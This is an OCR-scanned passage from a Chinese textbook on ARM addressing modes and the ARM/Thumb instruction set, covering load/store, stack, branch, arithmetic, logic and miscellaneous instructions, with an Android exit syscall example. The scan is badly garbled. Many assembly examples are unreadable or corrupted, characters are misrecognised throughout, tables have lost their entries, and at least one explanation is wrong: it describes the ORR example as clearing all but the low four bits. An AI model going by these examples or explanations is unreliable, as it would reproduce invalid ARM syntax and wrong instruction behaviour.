的 操作 数 保 存在 寄存 器 指定 地 址 的 存储 单元 中 。 例 如 : 

了 DR 天 和 [LD] 

指令 的 功能 是 将 R1 寄 存 器 的 数值 作为 地 址 ， 取 出 此 地 址 中 的 值 赋 给 
R0 寄 存 器 。 


6.4.5” 基 址 寻 址 

















基 址 寻 址 是 将 地 址 码 给 出 的 基 址 寄存 器 与 侦 移 量 相 加 ， 形 成 操作 数 
的 有 效 地 址 ， 所 希 的 操作 数 保存 在 有 效 地 址 所 指 回 的 存储 单元 中 。 基 址 
寻 址 多 用 于 查 表 、 数 组 访问 等 操作 。 例 如 : 


LDR RO, [R1, #-4] 
间 令 的 功能 是 将 R1 寄 存 器 的 数值 减 4 作 为 地 址 ， 取 出 此 地 址 的 值 赋 
给 R0 寄 存 器 。 


6.4.6 ”多 寄存 器 寻 址 











多 寄存 器 寻 址 一 条 指令 最 多 可 以 完成 16 个 通用 寄存 器 值 的 传送 。 例 
如 : 


BEMEA RO. RE Ra Rd Red 

LDM 是 数据 加 载 指 令 ， 指 令 的 后 级 IA 表 示 每 次 执行 完 加 载 操 作 后 
RO 寄存器 的 值 自 增 1 个 字 ，ARM 指 令 集 中 ， 字 表示 的 是 一 个 32 位 的 数 
值 。 这 条 指令 执行 后 ，R1=[R0]，R2=[R0+#4]，R3=[R0+#8]，R4= 
[RO+#12]。 


6.4.7 堆栈 寻 址 











堆栈 寻 址 是 ARM 处 理 器 特有 的 一 种 寻 址 方式 ， 堆 栈 寻 址 需要 使 用 
特定 的 指令 来 完成 。 堆 栈 寻 址 的 指令 有 LDMFA/STMFA、 
LDMEA/STMEA、~ LDMFD/STMFD、 LDMED/STMED. 

LDM 和 STM 为 指令 前 级 ， 表 示 多 突 存 器 寻 址 ， 即 一 次 可 以 传送 多 
个 寄存 器 值 。FA、EA、FD、ED 为 指令 后 级 ， 详 细 的 指令 介绍 请 参看 
6.5.3 小 节 。 








堆栈 寻 址 举例 : 
STMFD SP!，{R1-R7，LR} @ 将 R1~R7，LR 入 栈 。 多 用 于 保存 子 程序 “现场 ” 
LDMFD SP!，{R1-R7，LR} @ 将 数据 出 栈 ， 放 入 R1~R7，LR 寄 存 器 。 多 用 于 恢复 子 程序 “现场 ” 


6.4.8” 块 找 贝 寻 址 


块 找 贝 寻 址 可 实现 连续 地 址 数据 从 存储 器 的 茶 一 位 置 拷贝 到 另 一 位 





置 。 块 拷贝 寻 址 的 指令 有 LDMIA/STMIA、LDMDA/STMDA、 
LDMIB/STMIB、 LDMDB/STMDB.。 

LDM 和 STM 为 指令 前 缀 ， 表 示 多 寄存 器 寻 址 ， 即 一 次 可 以 传送 多 
个 寄存 器 值 。IA、DA、IB、DB 为 指令 后 级 ， 详 细 的 指令 介绍 请 参看 
6.5.3 小 节 。 


块 找 贝 寻 址 举例 ; 
LDMIA R0! ， {R1-R3} @ 从 RO 寄存器 指向 的 存储 单元 中 读 取 3 个 字 到 R1-R3 寄 存 器 
STMIA RO! ， {R1-R3} @ 存 储 R1-R3 寄 存 器 的 内 容 到 RO 寄存 器 指向 的 存储 单元 


6.4.9 ”相对 寻 址 


相对 寻 址 以 程序 计数 器 PC 的 当前 值 为 基地 址 ， 指 令 中 的 地 址 标号 
作为 偏 移 量 ， 将 两 者 相 加 之 后 得 到 操作 数 的 有 效 地 址 。 例 如 : 


BL NEXT 


BL NEXT 是 跳 到 NEXT 标 号 处 执行 。 这 里 的 BL 采用 的 就 是 相对 寻 
址 ， 标 号 NEXT 就 是 偏 移 量 。 


6.5 “ARM 与 Thumb 指 令 集 


指令 集 是 处 理 器 的 核心 ， 随 着 ARM 处 理 器 版 本 的 升级 ， 支 持 的 指 
令 集 也 在 不 断 的 增加 ， 其 中 被 广泛 使 用 的 应 属 ARM 指 令 集 与 Thumb 指 令 
集 了 。Thumb 指 令 集 可 以 理解 为 ARM 指 令 集 的 一 个 子 集 ， 因 此 ， 本 节 将 
两 种 指令 集 放 在 一 起 ， 以 内 核 架 构 为 armv7-a 的 处 理 器 为 蓝本 进行 讲 
解 。 


6.5.1 指令 格式 


ARM 指 令 的 基本 格式 如 下 : 
<opcode>{ <cond> HSH.WI.N} <Rd>,<Rn>{,<operand2>} 
opcode 为 指令 助 记 符 。 如 MOV、ADD 等 。 本 章 主要 讲解 不 同类 型 
的 指令 助词 符 及 其 含义 。 
cond 为 执行 条 件 。 它 的 取 值 如 表 6-2 所 示 。 
表 6-2 ”指令 条 件 码 列表 





无 符号 0 





没有 洲 出 
无 符号 数 大 于 
无 符号 数 小 于 或 等 于 
有 符号 数 大 于 或 等 于 
有 符号 数 小 于 
有 符号 数 大 于 
有 符号 数 小 于 或 等 于 
无 条 件 执行 〈 指 令 默 认 条 件 ) 
S 指 定 指 令 是 否 影响 CPSR 寄 存 器 的 值 。 如 ADDS、SUBS 等 。 
.W 与 .N 为 指令 宽度 说 明 符 。 在 armv6t2 及 更 高 版 本 的 Thumb 代 码 
中 ， 部 分 指令 的 编码 即 可 以 是 16 位 ， 也 可 以 是 32 位 ， 正 常情 况 下 ， 这 两 
种 方式 的 代码 都 是 有 效 的 ， 但 默认 情况 下 会 生成 16 位 的 代码 ， 如 果 想 要 
生成 32 位 的 编码 ， 则 可 以 为 指令 加 上 .WwW 宽度 说 明 符 。 无 论 是 ARM 人 代码 
还 是 Thumb (armv6t2 或 更 高 版 本 ) 代码 ， 都 可 以 在 其 中 使 用 .W 宽 度 说 
明 符 ， 但 它 对 32 位 的 代码 没有 影响 。 如 果 要 将 指令 汇编 为 16 位 编码 ， 则 
可 以 为 指令 加 上 .N 宽 度 说 明 符 
Rd 为 目的 寄存 器 
Rn 为 第 一 个 操作 数 寄 存 器 。 
operand2 为 第 二 个 操作 数 。 第 二 个 操作 数 可 以 是 立即 数 、 寄 存 器 或 
寄存 器 移 位 操作 。 
日 令 格 式 举例 如 下 : 














MOV RO, #2 
ADD Rl1, RFR2, R3 
SUBSR2.. Rd Re LSL 2 


6.5.2” 跳 转 指 令 


跳 转 指令 又 称 为 分 文 指令 ， 它 可 以 改变 指令 序列 的 执行 流程 。 
ARM 中 有 两 种 方式 可 以 实现 程序 跳 转 : 一 种 是 使 用 跳 转 指令 直接 跳 
转 : 为 一 种 是 给 PC 寄存 器 和 直接 赋值 实现 跳 转 。 


跳 转 指 令 有 以 下 4 条 。 
1.，B 跳 转 指令 
Bf{ cond} label 


B 指 令 属于 ARM 指 令 集 ， 是 最 简单 的 分 文 指 令 。 当 执行 B 指 令 时 ， 
如 果 条 件 cond 满 足 ，ARM 处 理 器 将 立即 跳 转 到 label 指 定 的 地 址 处 继续 执 
行 。 例 如 :“BNE LABEL? 表 示 条 件 码 Z=0 时 跳 转 到 LABEL 处 执行 。 

2. BEL 带 链接 的 跳 转 指令 

BL{cond} label 

当 执 行 BL 指 令 时 ， 如 果 条 件 cond 满 足 ， 会 首先 将 当前 指令 的 下 一 
条 指令 的 地 址 拷贝 到 R14《〈 即 LR) 寄存 器 中 ， 然 后 跳 转 到 lable 指 定 的 地 
址 处 继续 执行 。 这 条 指令 通常 用 于 调用 子 程序 ， 在 子 程序 的 尾部 ， 可 以 
通过 “MOYV PC, LR” 返 回 到 主 程序 中 。 

3. BX 带 状 态 切 换 的 跳 转 指令 

BX{cond} Rm 

当 执 行 BX 指 令 时 ， 如 果 条 件 cond 满 足 ， 则 处 理 器 会 判断 Rm 的 位 [0] 
是 否 为 1， 如 果 为 1 则 跳 转 时 自动 将 CPSR 寄 存 器 的 标志 T 置 位 ， 并 将 上 日 标 
地 址 处 的 代码 解释 为 Thumb 代 码 来 执行 ， 即 处 理 器 会 切换 至 Thumb 状 
态 ;， 反 之 ， 若 Rm 的 位 [0] 为 0， 则 跳 转 时 自动 将 CPSR 寄 存 器 的 标志 工 复 


位 ， 并 将 目标 地 址 处 的 代码 解释 为 ARM 代 码 来 执行 ， 即 处 理 器 会 切换 
到 ARM 状 态 。 例 如 下 面 的 代码 : 


.Code 32 


ADR RO, thumbcode+l 


BX RO @ 丝 转 到 thumbcode 处 执行 ， 并 将 处 理 器 切换 为 Thumb 模 式 。 
thumbcode: 
.Code 16 
4. BLX 囊 链接 和 状态 切换 的 跳 转 指令 
BLX{cond} Rm 


BLX 指 令 集合 了 BL 与 BX 的 功能 ， 当 条 件 满足 时 ， 除 了 设置 链接 寄 
存 器 ， 还 根据 Rm 位 [0] 的 值 来 切换 处 理 亏 状 态 。 


6.5.3 ”存储 器 访问 指令 


存储 右 访 问 操作 包括 从 存储 器 中 加 载 数据 、 存 储 数 据 到 存储 器 、 寄 
存 器 与 存储 器 间 数 据 的 交换 等 。 

LDR 

LDR 用 于 从 存储 堪 中 加 载 数据 到 寄存 堪 中 ， 它 的 格式 如 下 : 

LDR{type}{ cond} Rd, label 

LDRD{ cond} Rd, Rd2, label 

type 指 明了 操作 的 数据 的 大 小 。 它 的 取 值 如 表 6-3 所 示 。 


表 6-3 ”tyte 取 值 


无 符号 字 节 (加 载 时 零 扩 展 为 32 位 ) 





有 符号 字 节 《加 载 时 符号 扩展 为 32 位 ) 
无 符号 半 字 〈 加 载 时 零 扩 展 为 32 位 ) 
有 符号 半 字 【加载 时 符号 扩展 为 32 位 ) 





cond 为 执行 条 件 ， 它 的 取 值 如 表 6-2 所 示 。 

Rt 为 要 加 载 的 寄存 器 。 

labe] 为 要 读 取 的 内 存 地 址 。 它 的 表示 方法 有 三 种 : 

1. 直接 偏 移 量 。 如 : LDR R8, [R9, #04] 、LDR R8, [R9], #04 
2. 寄存 器 偏 移 。 如 : LDR R8, [R9, R10, #04] 

3. 相对 PC。 如 : LDR R8, labell 

LDRD 一 次 加 载 双 字 的 数据 ， 将 数据 加 载 到 Rd 与 Rd2 寄 存 器 中 。 


已 A YY 
LDRD 指 令 举 例如 下 : 
LDRD R0，R1，1label2 @ 从 标号 1abe12 指 癌 的 内 存 中 加 载 两 个 字 的 数据 到 R0 与 R1 寄 存 器 中 
STR 


STR 用 于 存储 数据 到 指定 地 址 的 存储 单元 中 。 它 的 格式 如 下 : 
STRf{type}H cond} Rd, label 

STRDf{cond} Rd, Rd2, label 

STR 指 令 与 LDR 指 令 的 格式 相同 ， 只 是 type 中 的 SB 与 SH 对 STR 无 


必 。STR 指 令 举 例如 下 : 


STR RO, [R2, #04] @ 将 RO 寄存 器 的 数据 存储 到 R2+4 所 指 问 的 存储 单元 。 
LDM 


LDM 可 以 从 指定 的 存储 单元 加 载 多 个 数据 到 一 个 寄存 器 列表 。 它 


的 格式 如 下 : 


LDMf{addr_mode}{cond} Rn{!} reglist 
addr_mode 取 值 如 表 6-4 所 示 。 


表 6-4 addr mode 取 值 





addr mode 含 Si 


IA Increase After， 基 址 寄存 器 在 执行 指令 之 后 增加 ， 这 是 默认 情况 。 

IB Increase Before， 基 址 寄存 器 在 执行 指令 之 前 增加 〈 仅 ARM )。 

DA Decrease After， 基 址 寄存 器 在 执行 指令 之 后 减少 〈 仅 ARM )。 

DB Decrease Before， 基 址 寄存 器 在 执行 指令 之 前 减少 。 

FD 满 递 减 堆栈 。 堆 栈 问 低地 址 生长 ， 堆 栈 指针 指 问 最 后 一 个 入 栈 的 有 效 数 
据 项 。 

FA 满 递 增 堆 栈 。 堆 栈 回 高 地 址 生长 ,堆栈 指针 指向 下 一 个 要 放 入 的 空地 址 。 

ED 空 递减 堆栈 。 堆 栈 向 低地 址 生长 。 








EA 室 递 增 堆栈 。 扒 栈 向 高 地 址 生长 。 

cond 为 表 6-2 所 示 的 执行 条 件 。 

Rn 为 基地 寄存 器 ， 用 于 存储 初始 地 址 。 

! 为 可 选 的 后 级 。 如 果 有 ! ， 则 最 终 地 址 将 写 回 到 Rn 寄存 器 中 。 
reglist 为 用 来 存储 数据 的 寄存 器 列表 ， 用 大 括号 括 起 来 。 寄 存 器 列 
表 可 以 是 多 个 连续 的 寄存 器 ， 多 个 寄存 器 可 以 用 “-? 连 接 ， 如 R0-R3 表 示 
连接 的 R0 至 R3 寄 存 器 列表 ， 如 果 多 个 寄存 器 不 是 连续 的 ， 则 使 用 逗号 
将 它们 分 隅 开 来 ， 如 {R0, R1, R7}。 








LDM 指 令 举 例如 下 : 
LDMIA R0!， {R1-R3} @ 依 次 加 载 R0 指 癌 的 存储 单元 的 数据 到 R1、R2、R3 寄 存 器 。 
ST™ 


STM 将 一 个 寄存 器 列表 的 数据 存储 到 指定 的 存储 单元 。 它 的 格式 如 


STM{addr_mode}{ cond} Rn{!} reglist 
STM 与 LDM 的 格式 是 一 样 的 ，STM 指 令 举 例如 下 : 


STMDB R1!，{R3-R6，R11}) @ 将 R3-R6，R11 寄 存 器 的 内 容 存 储 到 R1 指 向 的 存储 单元 。 


STMFD SP!, {R3-R7} @ 将 R3-R7 寄 存 器 压 入 堆栈 ， 功 能 等 价 于 STMDB SP!，{R3-R7}。 
PUSH 

PUSH 将 寄存 器 推 入 满 递减 堆栈 。 它 的 格式 如 下 : 

PUSH{ cond} reglist 


PUSH 指 令 举 例如 下 : 


PUSH {r0, r4-r7} @ 将 RO、R4-R7 寄 存 器 内 容 压 入 堆栈 。 


POP 

POP 从 满 递减 堆栈 中 弹出 数据 到 寄存 器 。 它 的 格式 如 下 : 
POP{ cond} reglist 

POP 指 令 举 例如 下 : 

POP {r0，r4-r7} 8@ 将 RO0、R4-R7 寄 存 器 从 堆栈 中 弹出 。 
SWP 


SWP 用 于 寄存 占 与 存储 莫 之 间 的 数据 交换 。 它 的 格式 如 下 : 

SWP{B}{cond} Rd, Rm, [RN] 

B 是 可 选 的 字 闻 ， 奉 有 B， 则 交换 字 市 ， 耕 则 交换 32 位 的 字 。 

cond 为 表 6-2 所 示 的 执行 条 件 。 

Rd 为 要 从 存储 器 中 加 载 数据 的 寄存 器 。 

Rm 为 写 入 数据 到 存储 器 的 寄存 器 。 

Rn 为 需要 进行 数据 交换 的 存储 器 地 址 。Rn 不 能 与 Rd 和 Rm 相同 。 

如 果 Rd 与 Rm 相 同 ， 可 实现 单个 寄存 堪 与 存储 右 的 数据 交换 。 例 
如 : 


SWP R1, R1, [RO0] @ 将 R1 寄 存 器 与 RO 指向 的 存储 单元 的 内 容 进 行 交 换 。 
SWPB R1，R2，[R0]  @ 从 R0 指 向 的 存储 单元 读 取 一 个 字 节 存 入 R1 (高 24 位 清 零 ) ， 然 后 将 R2 寄 
存 器 的 字 节 内 容 存 储 到 该 存储 单元 。 


6.5.4 数据 处 理 指 令 


数据 处 理 指令 包括 数据 传送 指令 、 算 术 运 算 指令 、 逻 辑 运算 指令 以 
及 比较 指令 4 类 。 数 据 人 处 理 指令 主要 是 对 寄存 器 间 的 数据 进行 操作 。 所 
有 的 数据 处 理 指令 均 可 选择 使 用 S 后 经 ， 来 决定 是 否 影 响 状 态 标 志 ， 比 
较 指令 不 需要 S 后 级 ， 它 们 会 直接 影响 状态 标志 。 

数据 传送 指令 主要 用 于 寄存 器 间 的 数据 传送 。 


MOYV 




















MOV 为 ARM 指 令 集中 使 用 最 频 楷 的 指令 ， 它 的 功能 是 将 8 位 的 立即 
数 或 寄存 器 的 内 容 传送 到 目标 寄存 器 中 。 指 令 格 式 如 下 : 
MOV{cond HS} Rd, operand2 


MOV 指 令 举例 如 下 : 
MOV R0O， 井 8 QRO=8 
MOV R1, RO QR1=RO 


MOVS R2，R1，LSL #2 @R2=R1*4， 影 响 状 态 标 志 

MVN 

MVN 为 数据 非 传送 指令 。 它 的 功能 是 将 8 位 的 立即 数 或 寄存 咽 按 位 
取 反 后 传送 到 目标 寄存 器 中 。 指 令 格式 如 下 : 

MVN{cond}HS} Rd, operand2 








MVN 指 令 举例 如 下 : 
MVN RO, #0xFF @RO=O0XFFFFFFOO 
MVN R1, R2 e@ 将 R2 寄 存 器 数据 取 反 后 存 入 R1 寄 存 器 中 


算术 运算 指令 主要 完成 加 、 减 、 末 、 除 等 算术 运算 。 
ADD 
ADD 为 加 法 指令 。 它 的 功能 是 将 Rn 寄存 器 与 operand2 的 值 相 加 ， 结 


果 保 存 到 Rd 寄存 器 。 指 令 格 式 如 下 : 
ADD{condHS Rd, Rn, operand2 


ADD 指 令 举例 如 下 : 
DO 2 林 @R0O=R1+2 
ADDS RO Ri BR2 GeR0=R1L+R2， 影 响 标 志 位 


ADD RO,R1, LSL #3  @R0=R1*8 

ADC 

ADC 为 带 进位 加 法 指令 。 它 的 功能 是 将 Rn 寄存 器 与 operand2 的 值 相 
加 ， 再 加 上 CPSR 寄 存 器 的 C 条 件 标 志 位 的 值 ， 最 后 将 结果 保存 到 Rd 寄 
存 器 。 指 令 格 式 如 下 : 





ADC{cond}H{S} Rd, Rn, operand2 
ADC 指 令 举 例如 下 : 


ADIy RO RO, RZ2 
ADC R1, R1, R3 @ 两 条 指令 完成 64 位 加 法 ，(R1，R0) = (R1, R0) + (R3，R2) 


SUB 

SUB 为 减法 指令 。 它 的 功能 是 用 Rn 寄存 器 减 去 operand2 的 值 ， 结 果 
保存 到 Rd 寄存 器 中 。 指 令 格式 如 下 : 

SUB{cond}HS} Rd, Rn, operand2 


SUB 指 令 举例 如 下 : 

SUB RO, R1, #4 @RO=R1-4 

SBSI RO RL, R2 @R0=R1-R2， 影 啊 标志 位 
RSB 


RSB 为 逆 回 减法 指令 。 它 的 功能 是 用 operand2 减 去 Rn 寄存 器 ， 结 
保存 到 Rd 寄存 器 中 。 指 令 格 式 如 下 : 
RSB{cond}H{S} Rd, Rn, operand2 


RSB 指 令 举例 如 下 : 

RSB RO, R1, #0x1234 @RO=0x1234-R1 
RSB RO; Rl1 QRO=-R1 

SBC 


SBC 为 带 进位 减法 指令 。 它 的 功能 是 用 Rn 寄存 器 减 去 operand2 的 
值 ， 再 减 去 CPSR 寄 存 器 的 C 条 件 标志 位 的 值 ， 最 后 将 结果 保存 到 Rd 寄 
存 器 。 指 令 格式 如 下 : 

SBC{condHS} Rd, Rn, operand2 

SBC 指 令 举例 如 下 : 


SUBS RO, RO, R2 
SBE Ri, R1, R3 @ 两 条 指令 完成 64 位 减法 ，(R1, R0) = (R1, R0) - (R2，R3) 


RSC 





RSC 为 带 进 位 逆 同 减法 指令 。 它 的 功能 是 用 operand2 减 去 Rn 寄存 
器 ， 再 减 去 CPSR 寄 存 器 的 C 条 件 标志 位 的 值 ， 最 后 将 结果 保存 到 Rd 寄 
存 器 。 指 令 格式 如 下 : 

RSC{cond}{S} Rd, Rn, operand2 

RSC 指 令 举例 如 下 : 


RSBS R2, RO, #0 
RSC R3, R1, #0 8@ 了 两 条 指令 完成 64 位 数 取 反 。(R3，R2) = -(R1，R0) 





MUL 


MUL 为 32 位 乘法 指令 。 它 的 功能 是 将 Rm 寄存 如 与 Rn 寄存 右 的 值 相 


乘 ， 结 果 的 低 32 位 保存 到 Rd 寄存 器 中 。 指 令 格 式 如 下 : 
MUL{cond}HS} Rd, Rm, Rn 
MUL 指 令 举 例如 下 : 
MUL RO, R1, R2 @RO=R1 XR2 
MULS RO, R2, R3 GeR0=R2XR3， 影 响 CPSR 的 N 位 与 2 位 
MLS 


MLS 指 令 将 Rm 寄 存 器 和 Rn 寄存 器 中 的 值 相 乘 ， 然 后 再 从 Ra 寄存 器 
的 值 中 减 去 乘积 ， 最 后 将 所 得 结果 的 低 32 位 存 入 Rd 寄存 器 中 。 指 令 格式 
如 下 : 

MLS{cond}H{S} Rd, Rm, Rn, Ra 

MLS 指 令 举 例如 下 : 


MDS RO Rl R22 R3 @R0 的 值 为 R3 - R1XR2 结 果 的 低 32 位 。 





MLA 


MLA 指 令 将 Rm 寄 存 器 和 Rn 寄存 器 中 的 值 相 乘 ， 然 后 再 将 乘积 与 Ra 
寄存 器 中 的 值 相 加 ， 最 后 将 结 来 的 低 32 位 存 入 Rd 寄存 器 中 。 指 令 格式 如 
: 

MLAf{condHS} Rd, Rm, Rn, Ra 


MLA 指 令 举 例如 下 : 
2 R3 eR0 的 值 为 R3 + R1XR2 结 果 的 低 32 位 。 


UMULL 


UMULL 指 令 将 Rm 寄存 器 和 Rn 寄存 器 的 值 作为 无 符号 数 相 乘 ， 人 然后 
将 结果 的 低 32 位 存 入 RdLo 寄 存 器 ， 高 32 位 存 入 RdHi 寄 存 器 。 指 令 格 式 
如 下 : 

UMULL{cond}HS} RdLo, RdHi, Rm, Rn 

UMULL 指 令 举 例如 下 : 

UMULDD 0 ele Re: sis 人 (RE RO =: R22KRS 


UMLAL 


UMLAL 指 令 将 Rm 寄 存 器 和 Rn 寄存 器 的 值 作为 无 符号 数 相 乘 ， 然 后 
将 64 位 的 结果 与 RdHi、RdLo 组 成 的 64 位 数 相 加 ， 结 果 的 低 32 位 存 入 
RdLo 寄 存 器 ， 高 32 位 存 入 RdHi 寄 存 器 。 指 令 格 式 如 下 : 
UMLAL{cond}HS} RdLo, RdHi, Rm, Rn 


UMLAL 指 令 举 例如 下 : 
UMLAL RO, R1, R2 ,R3 RE “ROY = RZXRS + {RLEs RO) 


SMULL 


SMULL 指 令 将 Rm 寄 存 器 和 Rn 寄存 器 的 值 作为 有 符号 数 相 乘 ， 然 后 
将 结果 的 低 32 位 存 入 RdLo 寄 存 器 ， 高 32 位 存 入 RdHi 寄 存 器 。 指 令 格 式 
如 下 : 

SMULL{condHS} RdLo, RdHi, Rm, Rn 


SMULL 指 令 举 例如 下 : 
SMUEL ‘RO: Rl Fe: =R3 GiRi "RAY = R22KR3 





SMLAL 


SMLAL 指 令 将 Rm 寄 存 器 和 Rn 寄存 器 的 值 作 为 有 符号 数 相 滋 ， 然 后 
将 64 位 的 结果 与 RdHi、RdLo 组 成 的 64 位 数 相 加 ， 结 果 的 低 32 位 存 入 





RdLo 寄 存 器 ， 高 32 位 存 入 RdHi 寄 存 器 。 指 令 格 式 如 下 : 
SMLAL{cond}HS} RdLo, RdHi, Rm, Rn 
SMLAL 指 令 举 例如 下 : 
SMLAL RO, R1, R2 ,R3 (RL: -ROY = R22RER3 + {RL RC 


SMLAD 


SMLAD 指 令 将 Rm 寄存 器 的 低 半 字 和 Rn 寄存 右 的 低 半 字 相 乘 ， 然 后 
将 Rm 寄存 强 的 高 半 字 和 Rn 的 局 半 字 相 乘 ， 最 后 将 两 个 乘积 与 Ra 寄存 右 
的 值 相 加 并 存 入 Rd 寄存 器 。 指 令 格式 如 下 : 

SMLAD{cond HS} Rd, Rm, Rn Ra 


SMLSD 


SMLSD 指 令 将 Rm 寄存 器 的 低 半 字 和 Rn 寄存 莫 的 低 半 字 相 乘 ， 然 后 
将 Rm 寄存 强 的 高 半 字 和 Rn 的 高 半 字 相 习 ， 接 着 使 用 第 一 个 习 积 减 去 第 
二 个 乘积 ， 最 后 将 所 得 的 差 值 与 Ra 寄存 器 的 值 相 加 并 存 入 Rd 寄存 器 。 

旨 令 格式 如 下 : 
SMLSD{ cond}HS} Rd, Rm, Rn, Ra 








SDIV 
SDIV 为 有 符号 数 除 法 指令 。 它 的 格式 如 下 : 
SDIV{cond} Rd, Rm, Rn 


SDIV 指 令 举 例如 下 : 
SDIYV RO RL, RZ 


UDIV 
UDIV 为 无 符号 数 除 法 指令 。 它 的 格式 如 下 : 
UDIV{cond} Rd, Rm, Rn 


UDIV 指 令 举例 如 下 : 
BT FRO. :RL Fz @RO SRL BZ 


ASR 


ASR 为 算术 石 移 指令 。 它 的 功能 是 将 Rm 否 存 器 算术 右 移 operand2 
位 ， 并 使 用 符号 位 填充 空位 ， 移 位 结果 保存 到 Rd 寄存 器 中 。 它 的 指令 格 
式 如 下 : 

ASR{condHS} Rd, Rm, operand2 

ASR 指 令 举例 如 下 : 


ASR RO, R1, #2 @ 将 R1 寄 存 器 的 值 作 为 有 符号 数 右 移 2 位 后 赋 给 RO 寄存 器 。 


远 辑 运算 指令 主要 完成 与 、 或 、 寞 或 、 移 位 等 逻辑 运算 操作 。 
AND 


AND 为 逻辑 与 指令 。 它 的 指令 格式 如 下 : 
ANDf{cond}{S} Rd, Rn, operand2 








AND 指 令 举 例如 下 : 
AND RO, RO, #1 @ 指 令 用 来 测试 R0 的 最 低位 
ORR 


ORR 为 逻辑 或 指令 。 它 的 指令 格式 如 下 : 
ORR{ cond}H S} Rd, Rn, operand2 


ORR 指 令 举 例如 下 : 
ORR RO0，R0，#0x0F ”@ 指 令 执 行 后 保留 RO 的 低 四 位 ， 其 余 位 清 0 
EOR 


EOR 为 异 或 指令 。 它 的 指令 格式 如 下 : 
EOR{condHS} Rd, Rn, operand2 


EOR 指 令 举 例如 下 : 
EOR RO, RO, RO @ 指 令 执 行 后 RO 的 值 为 0 


BIC 
BIC 为 位 清除 指令 。 它 的 功能 是 将 operand2 的 值 取 反 ， 然 后 将 结果 





与 Rn 寄存 器 的 值 相 “与 ?并 保存 到 Rd 寄存 器 中 。 它 的 指令 格式 如 下 : 
BIC{ cond}H{S} Rd, Rn, operand2 


BIC 指 令 举 例如 下 : 
BIC RO, RO, #0xOF @ 将 RO 低 四 和 位 清 0， 其 余 位 保持 不 变 
LSL 


LSL 为 逻辑 左 移 指 令 。 它 的 功能 是 将 Rm 寄存 器 逻辑 左 移 operand2 
位 ， 并 将 空位 清 0， 移 位 结果 保存 到 Rd 寄存 器 中 。 它 的 指令 格式 如 下 : 
LSL{cond}HS} Rd, Rm, operand2 


LSL 指 令 举 例如 下 : 
SEO 和 上 关 忆 RE = :RL 本 
LSR 


LSR 为 逻辑 右 移 指令 。 它 的 功能 是 将 Rm 寄存 器 逻辑 右 移 operand2 
位 ， 并 将 空位 清 0， 移 位 结果 保存 到 Rd 寄存 器 中 。 它 的 指令 格式 如 下 : 
LSR {cond}HS} Rd, Rm, operand2 


LSR 指 令 举 例如 下 : 
ESR RO 过 全” 二 民 淖 洲 起 
ROR 


ROR 为 循环 右 移 指令 。 它 的 功能 是 将 Rm 寄存 器 循环 右 移 operand2 
位 ， 寄 存 器 右边 移出 的 位 移 回 到 左边 ， 移 位 结 末 保存 到 Rd 寄存 器 中 。 它 
的 指令 格式 如 下 : 

ROR {cond}HS} Rd, Rm, operand2 


LSR 指 令 举 例如 下 : 
ROR R1, R1, #1 @ 将 R1 寄 存 器 的 最 低位 移 到 最 高 位 
RRX 


RRX 为 带 扩展 的 循环 右 移 指令 。 它 的 功能 是 将 Rm 寄存 器 循环 右 移 1 
人 位， 寄存器 最 高 位 用 标志 位 的 值 填充 ， 移 位 结果 保存 到 Rd 寄存 右 中 。 它 


的 指令 格式 如 下 : 
RRX {cond}H{S} Rd, RM 
LSR 指 令 举 例如 下 : 


RRX R1, R1 @ 指 令 执 行 后 R1 寄 存 器 右 移 1 位 ， 最 高 位 用 标志 填充 

比较 指令 用 于 比较 两 个 操作 数 之 间 的 值 。 

CMP 

CMP 指 令 使 用 Rn 寄存 器 减 去 operand2 的 值 ， 这 与 SUBS 指 令 功 能 相 
同 ， 但 CMP 指 令 不 保存 计算 结果 ， 仅 根据 比较 结果 设置 标志 位 。 指 令 格 
式 如 下 : 

CMP {cond} Rn, operand2 


CMP 指 令 举 例如 下 : 
CMP RO, #0 @ 判 断 R0 寄 存 器 值 是 否 为 0 
CMN 


CMN 指 令 将 operand2 的 值 加 到 Rn 寄存 器 上 ， 这 与 ADDS 指 令 功 能 相 
同 ， 但 CMN 指 令 不 保存 计算 结果 ， 仪 根据 计算 结果 设置 标志 位 。 指 令 
格式 如 下 : 

CMN {cond} Rn, operand2 


CMN 指 令 举 例如 下 : 
CMN RO RE 
TST 


TST 为 位 测试 指令 。 它 的 功能 是 将 Rn 寄存 器 的 值 和 operand2 的 值 进 
行 “与 运算， 这 与 ANDS 指 令 功 能 相同 ， 但 TST 指 令 不 保存 计算 结果 ， 
仅 根 据 计 算 结果 设置 标志 位 。 指 令 格式 如 下 : 

TST {cond} Rn, operand2 


TST 指 令 举例 如 下 : 
TST RO, #1 @ 判 断 R0 寄 存 器 最 低位 是 否 为 1 





TEQ 


TEQ 的 功能 是 将 Rn 寄存 器 的 值 和 operand2 的 值 进 行 “ 异 或 "运算 ， 这 
与 EORS 指 令 功 能 相同 ， 但 TEQ 指 令 不 保存 计算 结果 ， 仪 根据 计算 结果 
设置 标志 位 。 指 令 格式 如 下 : 

TEQ {cond} Rn, operand2 


TEQ 指 令 举 例如 下 : 
TEQ RO, R1 e@ 判 断 R0 寄 存 器 与 R1 寄 存 器 的 值 是 否 相 等 


6.5.5 “其它 指 令 





除了 上 面 讲 到 的 指令 外 ， 还 有 一 些 不 常用 或 未 归 类 的 杂项 指令 。 
SWI 


SWI 是 软 中 断 指令 。 该 指令 用 于 产生 软 中 断 ， 从 而 实现 从 用 户 模式 
到 管理 模式 的 切换 。 如 系统 功能 调用 。 指 令 格式 如 下 : 

SWI {cond}, immed_24 

immed_24 为 24 位 的 中 断 号 ， 在 Android 的 系统 中 ， 系 统 功能 调用 为 0 
号 中 断 ， 使 用 R7 寄 存 吉 存放 系统 调用 号 。 使 用 R0-R3 寄 存 器 来 传递 系统 
调用 的 前 4 个 参数 ， 对 于 大 于 4 个 参数 的 调用 ， 剩 余 参数 采用 堆栈 来 传 
递 。 例 如 调用 exit(0) 的 汇编 代码 如 下 : 








MOV RO, #0 @ 参 数 0 

MOV R7, #1 @ 系 统 功 能 号 1 为 exit 
SWI #0 @ 执 行 exit (0) 

NOP 


NOP 为 空 操作 指令 。 该 指令 仅 用 于 空 操作 或 字 节 对 齐 。 指 令 格 式 只 
有 一 个 操作 码 NOP。 


MRS 


MRS 为 读 状 态 寄存 器 指令 。 该 指令 格式 如 下 : 


MRS Rd, psr 

psr 的 取 值 可 以 是 CPSR 或 SPSR。 

MRS 指 令 举 例如 下 : 

MRS RO, CPSR @ 读 取 CPSR 寄 存 器 到 R0 寄 人 存 需 中 
MSR 


MSR 为 写 状态 寄存 器 指令 。 该 指令 格式 如 下 : 

MSR Rd, psr_fields, operand2 

